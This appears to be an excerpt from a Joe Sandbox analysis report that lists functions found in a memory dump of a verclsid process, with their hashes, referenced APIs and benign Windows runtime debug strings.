                                                                                                                                              Function 04F86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                              • Instruction ID: 4ec841eddb9ae990080838ba8ce964a083b22199e47454e1d61ce360d1245d90
                                                                                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                              • Instruction Fuzzy Hash: AF021671508341AFE305EF28C894A6FBBE5EFC8714F14892DF9859B264DB31E906CB52
                                                                                                                                              Function 04EFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                              • Instruction ID: e2a4a89d38ef5bfa26c974fab18f370821d0add74b56e9e6295c61394da87d1a
                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                              • Instruction Fuzzy Hash: 2081E270E052899EDF24CF68CC917FEBBB2AF85318F186659DA61A72D0D734B840CB50
                                                                                                                                              Function 04F620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                              • Opcode ID: b947e677bf76270b4584c10b85051864583316af85f21b5d86711aaa1909cf14
                                                                                                                                              • Instruction ID: ca604254b8ec84f5a5d1ce62db90eb51eefe2c952663f69adc765a7f79e7b979
                                                                                                                                              • Opcode Fuzzy Hash: b947e677bf76270b4584c10b85051864583316af85f21b5d86711aaa1909cf14
                                                                                                                                              • Instruction Fuzzy Hash: 2B213176E00119ABDB10EFA9DC40AEFB7F8EF54744F450156E905E3241EB30FA129BA1
                                                                                                                                              Function 04EDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F202BD
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F2031E
                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F202E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                              • Opcode ID: 96172d22e60b168a74d87c653d63a4d3b3e09ec46c3897ff2b933067012dae91
                                                                                                                                              • Instruction ID: ea5bf0d4fb2e4ce91437a9756b973ce80f838ad4ed928fda2fc97b38809e8466
                                                                                                                                              • Opcode Fuzzy Hash: 96172d22e60b168a74d87c653d63a4d3b3e09ec46c3897ff2b933067012dae91
                                                                                                                                              • Instruction Fuzzy Hash: 8FE1B171A047419FD724CF28C984B6AB7E0FF48318F141A69F5A68B2E0DB74F846CB52
                                                                                                                                              Function 04EEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • RTL: Resource at %p, xrefs: 04F27B8E
                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F27B7F
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F27BAC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                              • Opcode ID: 856140260d19f7ccdd3162caba189ea85cc148a0f19abff6852f2e07b13582c1
                                                                                                                                              • Instruction ID: 89a3defe82fcf46f05e9857f2739e2609030120ddbd291edba5c2c9cef7a121d
                                                                                                                                              • Opcode Fuzzy Hash: 856140260d19f7ccdd3162caba189ea85cc148a0f19abff6852f2e07b13582c1
                                                                                                                                              • Instruction Fuzzy Hash: 0C41DE317017029FDB24DE26CD40B6AB7E5EF88725F101A2DE95ADB690DB31F806CB91
                                                                                                                                              Function 04EEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F2728C
                                                                                                                                              Strings
                                                                                                                                              • RTL: Resource at %p, xrefs: 04F272A3
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F272C1
                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F27294
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                              • Opcode ID: 4fdb7484a4960247f73a9d635b79d6a944f219c2d365dc84bdf479f1795b2ac2
                                                                                                                                              • Instruction ID: fcc17df1dcf7e7fcd92824d437773f7a088b089c1d2826f9681327db10a025ae
                                                                                                                                              • Opcode Fuzzy Hash: 4fdb7484a4960247f73a9d635b79d6a944f219c2d365dc84bdf479f1795b2ac2
                                                                                                                                              • Instruction Fuzzy Hash: DE41F031B00612AFDB24EE25CD41B66B7E5FF84714F101619F955EB280EB31F8528BE1
                                                                                                                                              Function 04F62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                              • Opcode ID: 72315b4ad21c40495a129d6706c979162998671e385b4be5d5687dcb9c588073
                                                                                                                                              • Instruction ID: 3a84bfbc5c0f2478dac7a0c4ed05afe53c4af721e48c99c673c26fb3f7ef1e23
                                                                                                                                              • Opcode Fuzzy Hash: 72315b4ad21c40495a129d6706c979162998671e385b4be5d5687dcb9c588073
                                                                                                                                              • Instruction Fuzzy Hash: 99318472A002199FDB20DF2CDC41BEE77B8EB44714F454596E849E3240EB30BA559BA1
                                                                                                                                              Function 04EF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-
                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction ID: d23dee6d6120381f196d245fb3cdb4c8ffa6b423246dd7605ad4a2577278f05f
                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction Fuzzy Hash: 1C91A471E002169BEB24DF69CC81AFEB7A5FF44328F54661AEA55E72C0E730B941C760
                                                                                                                                              Function 04EB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $$@
                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                              • Opcode ID: d2c3b9eef2175eecb9efa293d5ce97d73261e8496ebb1cb06465393d3d242aff
                                                                                                                                              • Instruction ID: eaf6fa31546e5be40d9bb45a78f758afa1af3e22d81387443964badb00f9b23b
                                                                                                                                              • Opcode Fuzzy Hash: d2c3b9eef2175eecb9efa293d5ce97d73261e8496ebb1cb06465393d3d242aff
                                                                                                                                              • Instruction Fuzzy Hash: 20812DB1D002699BDB35CB54CD44BEEB7B4AF08714F0141EAEA59B7290E7306E81DFA0